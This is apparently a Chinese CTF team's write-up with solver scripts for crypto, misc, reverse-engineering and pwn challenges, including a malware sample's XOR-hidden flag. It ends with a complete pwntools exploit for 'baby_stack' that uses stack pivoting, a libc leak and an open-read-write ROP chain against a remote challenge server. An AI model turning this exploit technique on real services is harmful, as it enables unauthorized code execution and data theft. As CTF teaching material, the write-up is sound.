79 * a1 + 10 * a2 + 66 * a3 + 31 * a4 + 76 * a5 + 58 * a6 + 45 * a7 + 64 * a8 + 97 * a9 + 9 * a10 + 15 * a11 + 6 * a12 + 61 * a13 + 65 * a14 + 52 * a15 + 1 * a16 + 38 * a17 + 11 * a18 + 66 * a19 + 21 * a20 + 30 * a21 + 76 * a22 + 41 * a23 + 75 * a24 + 52 * a25 + 45 * a26 + 91 * a27 + 96 * a28 + 29 * a29 + 64 * a30 + 59 * a31 == 149303
87 * a1 + 64 * a2 + 72 * a3 + 22 * a4 + 38 * a5 + 64 * a6 + 27 * a7 + 35 * a8 + 18 * a9 + 24 * a10 + 64 * a11 + 80 * a12 + 35 * a13 + 56 * a14 + 39 * a15 + 97 * a16 + 83 * a17 + 88 * a18 + 21 * a19 + 51 * a20 + 76 * a21 + 63 * a22 + 54 * a23 + 38 * a24 + 92 * a25 + 56 * a26 + 84 * a27 + 75 * a28 + 38 * a29 + 2 * a30 + 43 * a31 == 162212
94 * a1 + 70 * a2 + 72 * a3 + 93 * a4 + 17 * a5 + 56 * a6 + 53 * a7 + 78 * a8 + 72 * a9 + 49 * a10 + 86 * a11 + 62 * a12 + 41 * a13 + 85 * a14 + 69 * a15 + 71 * a16 + 20 * a17 + 34 * a18 + 24 * a19 + 24 * a20 + 14 * a21 + 86 * a22 + 54 * a23 + 13 * a24 + 41 * a25 + 68 * a26 + 31 * a27 + 50 * a28 + 23 * a29 + 94 * a30 + 72 * a31 == 162137
34 * a1 + 95 * a2 + 66 * a3 + 79 * a4 + 91 * a5 + 35 * a6 + 8 * a7 + 16 * a8 + 95 * a9 + 95 * a10 + 40 * a11 + 68 * a12 + 13 * a13 + 54 * a14 + 80 * a15 + 98 * a16 + 15 * a17 + 39 * a18 + 41 * a19 + 79 * a20 + 34 * a21 + 54 * a22 + 92 * a23 + 17 * a24 + 97 * a25 + 76 * a26 + 49 * a27 + 95 * a28 + 6 * a29 + 83 * a30 + 79 * a31 == 180077
74 * a1 + 42 * a2 + 45 * a3 + 72 * a4 + 6 * a5 + 3 * a6 + 59 * a7 + 47 * a8 + 57 * a9 + 62 * a10 + 85 * a11 + 6 * a12 + 72 * a13 + 25 * a14 + 78 * a15 + 27 * a16 + 6 * a17 + 27 * a18 + 61 * a19 + 88 * a20 + 60 * a21 + 89 * a22 + 53 * a23 + 76 * a24 + 97 * a25 + 56 * a26 + 52 * a27 + 26 * a28 + 5 * a29 + 7 * a30 + 35 * a31 == 142239
53 * a1 + 30 * a2 + 63 * a3 + 88 * a4 + 54 * a5 + 99 * a6 + 40 * a7 + 85 * a8 + 42 * a9 + 35 * a10 + 99 * a11 + 88 * a12 + 55 * a13 + 8 * a14 + 24 * a15 + 91 * a16 + 55 * a17 + 23 * a18 + 53 * a19 + 68 * a20 + 76 * a21 + 49 * a22 + 32 * a23 + 80 * a24 + 81 * a25 + 95 * a26 + 21 * a27 + 73 * a28 + 83 * a29 + 46 * a30 + 44 * a31 == 179115
55 * a1 + 43 * a2 + 39 * a3 + 27 * a4 + 19 * a5 + 41 * a6 + 7 * a7 + 70 * a8 + 54 * a9 + 53 * a10 + 38 * a11 + 72 * a12 + 50 * a13 + 1 * a14 + 15 * a15 + 89 * a16 + 79 * a17 + 17 * a18 + 32 * a19 + 58 * a20 + 64 * a21 + 68 * a22 + 12 * a23 + 92 * a24 + 53 * a25 + 33 * a26 + 54 * a27 + 67 * a28 + 34 * a29 + 25 * a30 + 37 * a31 == 140482
89 * a1 + 93 * a2 + 48 * a3 + 5 * a4 + 37 * a5 + 76 * a6 + 32 * a7 + 66 * a8 + 25 * a9 + 39 * a10 + 59 * a11 + 14 * a12 + 48 * a13 + 62 * a14 + 4 * a15 + 76 * a16 + 72 * a17 + 78 * a18 + 40 * a19 + 96 * a20 + 68 * a21 + 35 * a22 + 89 * a23 + 3 * a24 + 29 * a25 + 17 * a26 + 63 * a27 + 43 * a28 + 61 * a29 + 37 * a30 + 12 * a31 == 142706
4 * a1 + 25 * a2 + 16 * a3 + 45 * a4 + 65 * a5 + 17 * a6 + 39 * a7 + 59 * a8 + 82 * a9 + 54 * a10 + 69 * a11 + 59 * a12 + 86 * a13 + 37 * a14 + 70 * a15 + 21 * a16 + 46 * a17 + 89 * a18 + 96 * a19 + 32 * a20 + 35 * a21 + 69 * a22 + 22 * a23 + 13 * a24 + 95 * a25 + 58 * a26 + 94 * a27 + 29 * a28 + 84 * a29 + 24 * a30 + 3 * a31 == 146480
50 * a1 + 48 * a2 + 87 * a3 + 37 * a4 + 53 * a5 + 19 * a6 + 24 * a7 + 30 * a8 + 40 * a9 + 31 * a10 + 18 * a11 + 89 * a12 + 81 * a13 + 70 * a14 + 98 * a15 + 87 * a16 + 98 * a17 + 82 * a18 + 31 * a19 + 71 * a20 + 30 * a21 + 28 * a22 + 95 * a23 + 22 * a24 + 15 * a25 + 73 * a26 + 51 * a27 + 92 * a28 + 32 * a29 + 97 * a30 + 65 * a31 == 168401
40 * a1 + 20 * a2 + 13 * a3 + 25 * a4 + 87 * a5 + 95 * a6 + 47 * a7 + 80 * a8 + 22 * a9 + 43 * a10 + 4 * a11 + 83 * a12 + 50 * a13 + 85 * a14 + 39 * a15 + 22 * a16 + 75 * a17 + 3 * a18 + 22 * a19 + 6 * a20 + 16 * a21 + 29 * a22 + 65 * a23 + 19 * a24 + 64 * a25 + 48 * a26 + 41 * a27 + 8 * a28 + 10 * a29 + 66 * a30 + 12 * a31 == 117331
37 * a1 + 49 * a2 + 63 * a3 + 49 * a4 + 3 * a5 + 54 * a6 + 52 * a7 + 61 * a8 + 58 * a9 + 36 * a10 + 24 * a11 + 6 * a12 + 46 * a13 + 47 * a14 + 16 * a15 + 29 * a16 + 83 * a17 + 2 * a18 + 50 * a19 + 94 * a20 + 38 * a21 + 56 * a22 + 34 * a23 + 13 * a24 + 34 * a25 + 12 * a26 + 41 * a27 + 47 * a28 + 35 * a29 + 67 * a30 + 74 * a31 == 125357
37 * a1 + 2 * a2 + 12 * a3 + 84 * a4 + 79 * a5 + 36 * a6 + 93 * a7 + 64 * a8 + 68 * a9 + 7 * a10 + 37 * a11 + 58 * a12 + 68 * a13 + 49 * a14 + 19 * a15 + 95 * a16 + 43 * a17 + 22 * a18 + 10 * a19 + 21 * a20 + 70 * a21 + 72 * a22 + 73 * a23 + 19 * a24 + 32 * a25 + 8 * a26 + 6 * a27 + 89 * a28 + 43 * a29 + 32 * a30 + 95 * a31 == 138223
24 * a1 + 23 * a2 + 12 * a3 + 73 * a4 + 32 * a5 + 3 * a6 + 61 * a7 + 51 * a8 + 85 * a9 + 94 * a10 + 36 * a11 + 90 * a12 + 49 * a13 + 97 * a14 + 18 * a15 + 55 * a16 + 26 * a17 + 40 * a18 + 39 * a19 + 95 * a20 + 61 * a21 + 17 * a22 + 29 * a23 + 7 * a24 + 40 * a25 + 58 * a26 + 5 * a27 + 49 * a28 + 2 * a29 + 83 * a30 + 69 * a31 == 136759
64 * a1 + 28 * a2 + 52 * a3 + 74 * a4 + 84 * a5 + 36 * a6 + 39 * a7 + 55 * a8 + 40 * a9 + 44 * a10 + 47 * a11 + 23 * a12 + 1 * a13 + 58 * a14 + 33 * a15 + 25 * a16 + 70 * a17 + 20 * a18 + 45 * a19 + 33 * a20 + 15 * a21 + 77 * a22 + 46 * a23 + 8 * a24 + 5 * a25 + 98 * a26 + 39 * a27 + 72 * a28 + 9 * a29 + 99 * a30 + 25 * a31 == 128285
39 * a1 + 8 * a2 + 57 * a3 + 39 * a4 + 27 * a5 + 98 * a6 + 70 * a7 + 77 * a8 + 97 * a9 + 20 * a10 + 5 * a11 + 2 * a12 + 62 * a13 + 88 * a14 + 42 * a15 + 58 * a16 + 86 * a17 + 94 * a18 + 91 * a19 + 76 * a20 + 46 * a21 + 32 * a22 + 10 * a23 + 75 * a24 + 99 * a25 + 62 * a26 + 76 * a27 + 78 * a28 + 72 * a29 + 50 * a30 + 50 * a31 == 173243
52 * a1 + 69 * a2 + 20 * a3 + 29 * a4 + 23 * a5 + 30 * a6 + 74 * a7 + 21 * a8 + 9 * a9 + 5 * a10 + 76 * a11 + 5 * a12 + 45 * a13 + 49 * a14 + 59 * a15 + 25 * a16 + 98 * a17 + 54 * a18 + 80 * a19 + 19 * a20 + 51 * a21 + 37 * a22 + 85 * a23 + 84 * a24 + 78 * a25 + 54 * a26 + 5 * a27 + 21 * a28 + 97 * a29 + 92 * a30 + 78 * a31 == 138560

之后将得到的算式用 z3 求解出结果,再用 chr转换并拼接起来即可得到flag。

res = open('yes.txt','r').read().strip()
res = res.split('\n')
#print(len(res))
from z3 import *
for i in range(1,32):
    exec(f"a{i} = BitVec('a{i}',7)")
    
s = Solver()

for i in res:
    s.add(eval(i))

# 有解对结果进行处理	
flag = ""
if s.check() == sat:
    res = s.model()
    for i in range(1,32):
        name = f'res[a{i}]'
        num = eval(name)
        #print(chr(int(str(num))))
        flag += chr(int(str(num)))

print(flag)
# flag{l0ng_1iv3_tHe_liT4ng_kiNg}

帕鲁服务器

一和二是一起做的(

先用火眼把恶意软件提取出来。

根据创建时间判断出恶意程序。

ida分析,看到一个类似flag的字符串。

这是 帕鲁服务器#2 的flag。

再接着分析:

这部分代码对v4做了个异或,猜测是 帕鲁服务器#1 flag,写个脚本解出来。

#include<iostream>
using namespace std;

int main()
{
	int a[33]={
	   67,  73,  68,  66,  94, 112,  87, 122,  86,  22, 
	   87, 115,  64,  87, 122,  20,  86, 122,  75,  21, 
	   82, 122,  72, 124, 122,  85,  17,  73,  88};
	for(int i=0;i<=28;i++){
		cout << char(a[i]^0x25);
	}
	
}
// flag{Ur_s3rVer_1s_n0w_mY_p4l}

过去的CD

题目给了一个nrg 文件,用软碟通查看,发现有一个 wav 音频,提取出来。

Audacity查看音频,选择 音高 ,发现音频只有上下两种状态,且间隔比较固定,猜测是二进制。

根据上为1,下为0,以第一个下的宽度为固定间隔,把音频转成1和0。(手动转换)

01100110001101101000011011100110110111100100011010100110110011000000111011111010010001101111011000001100000011101111101001000110110011001010011000001110101111100101000011

最后把二进制转成字符即可得到flag。

RE

xor++

分析:

就一个异或,每次异或后v8++

#include<iostream>
using namespace std;

int main()
{
	char v4[37]="%($!<*<";
	v4[7] = 30;
	v4[8] = 20;
	v4[9] = 40;
	v4[10] = 36;
	v4[11] = 40;
	v4[12] = 41;
	v4[13] = 97;
	v4[14] = 50;
	v4[15] = 39;
	v4[16] = 63;
	v4[17] = 32;
	v4[18] = 12;
	v4[19] = 9;
	v4[20] = 32;
	v4[21] = 104;
	v4[22] = 55;
	v4[23] = 46;
	v4[24] = 4;
	v4[25] = 63;
	v4[26] = 53;
	v4[27] = 106;
	v4[28] = 17;
	v4[29] = 7;
	v4[30] = 4;
	v4[31] = 61;
	v4[32] = 14;
	v4[33] = 17;
	v4[34] = 38;
	v4[35] = 14;
	v4[36] = 26;
	int v8 = 67;
	for ( int i = 0; i <= 0x24; ++i )
	{
		cout << char((v8^v4[i]));
		v8++;
	}
}
// flag{buT_diff1cultY_w0nt_ch4Nge_muCh}

钩子

ida硬找(

发现这里实现了一个rc4加密,猜测这里能出flag。

把key和密文扒下来,解密即可得到flag。

#include<iostream>
using namespace std;

void init(unsigned char *v10,unsigned char *byte_7FF72ABB1410){
	int v9 = 0;
	for ( int j = 0; j < 256; ++j )
	{
		v9 = (byte_7FF72ABB1410[j % 0x20] + v10[j] + v9) % 256;
		unsigned char tmp = v10[j];
		v10[j] = v10[v9];
		v10[v9] = tmp;
	}
}

int main()
{
	unsigned char v10[256];
	for ( int i = 0; i < 256; ++i )
	    v10[i] = i;
	unsigned char byte_7FF72ABB1410[32] = {136, 227, 238,  17, 198,  73, 116, 165, 221, 152, 
	   89, 233,  72, 247, 110, 191,  58, 179, 155, 223, 
	   16,  66, 255, 153, 108, 227,  62,   5,  44, 101, 
	   71, 239};
	unsigned char byte_7FF72ABB1430[26]={2, 204,  71, 179,  77, 108, 253, 154,  76,  78, 
	  212, 139,  30, 129,  25,  10,  52,  38, 208, 255, 
	  112, 182, 176, 146,  73, 179};
	init(v10,byte_7FF72ABB1410);
	int v6=0;
	int v8=0;
	for ( int k = 0; k < 26; ++k )
	{
		v6 = (v6 + 1) % 256;
		v8 = ((unsigned __int8)v10[v6] + v8) % 256;
		unsigned char tmp = v10[v6];
		v10[v6] = v10[v8];
		v10[v8] = tmp;
		unsigned char out = (unsigned __int8)v10[((unsigned __int8)v10[v8] + (unsigned __int8)v10[v6]) % 256] ^ byte_7FF72ABB1430[k];
		cout << out;
	}
	
}
// flag{ho00OoOoOoked_gotcha}

睡_Lite

文件名是 sleep_lite.ino.with_bootloader.standard.hex ,了解了一下是固件的hex文件。

ida分析,模式全都试一遍,直到能看到函数反编译出来。

选择 AVR 模式,能看到有函数反编译出来了。

稍微看一下,F5 不能用,但可以发现sub_48被多次调用,结合题意,猜测这是sleep函数。

接着就找 call 之前的操作,发现了字符。

把这些字符收集起来,即可得到flag。

flag{dEl4y_n0_MoR3}

Pwn

摩登Pwn

分析

发送一个0x80000000即可达成条件,需要转成10进制

baby_stack

栈迁移,前面有很大一串内存地址可以存放rop链,通过第一个输入点可以带出old_rbp,相当于可以通过计算偏移知道我们写入的rop链在栈上的那个位置,这样就不用去爆破了。开了沙箱,orw读flag。

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
ip_port = ['competition.blue-whale.me', 20896]
pwnfile = './pwn'

libcfile = './libc-2.23.so'
libc = ELF(libcfile)


def loginfo(a, b=None):
    if b is None:
        log.info(a)
    else:
        log.info(a + hex(b))


if len(sys.argv) == 2:
    if 'p' in sys.argv[1]:
        p = process(pwnfile)
    elif 'r' in sys.argv[1]:
        p = remote(ip_port[0], ip_port[1])
else:
    loginfo("INVALID_PARAMETER")
    sys.exit(1)


def recv64_addr():
    return u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))


def debug(content=None):
    if content is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, content)
        pause()


def exp():
    # debug('b *0x400AE0')
    payload = 'a'*0x140
    p.sendafter('content:', payload)
    rbp_addr = recv64_addr()
    loginfo('rbp_addr: ', rbp_addr)

    pop_rdi_ret = 0x400b93
    ret = 0x400B29
    read_got = 0x601050
    puts_plt = 0x4007E0
    leave_ret = 0x400B09
    func = 0x400A76

    rop = p64(ret)*10 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(0x400A76)
    payload = rop.ljust(0x140,'a')
    payload += p64(rbp_addr-0x150)
    payload += p64(leave_ret)

    p.sendafter('again:', payload)
    puts_addr = recv64_addr()

    libc_base = puts_addr - libc.symbols['read']
    loginfo('libc_base: ',libc_base)

    pop_rsi_ret = libc_base + 0x202f8
    pop_rdx_ret = libc_base + 0x1b92
    open_addr = libc_base + libc.symbols['open']
    read_addr = libc_base + libc.symbols['read']
    flag = rbp_addr - 0x1B0

    orw = p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)
    orw += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(rbp_addr - 0x1A0) + p64(read_addr)
    orw += p64(pop_rdi_ret) + p64(rbp_addr - 0x1A0) + p64(puts_plt)
    orw += p64(0)*2 + '/flag\x00'

    payload = orw.ljust(0x140,'a')
    payload += p64(rbp_addr-0x230)
    payload += p64(leave_ret)

    p.sendlineafter('content:', 'a')
    p.sendafter('again:', payload)

exp()
p.interactive()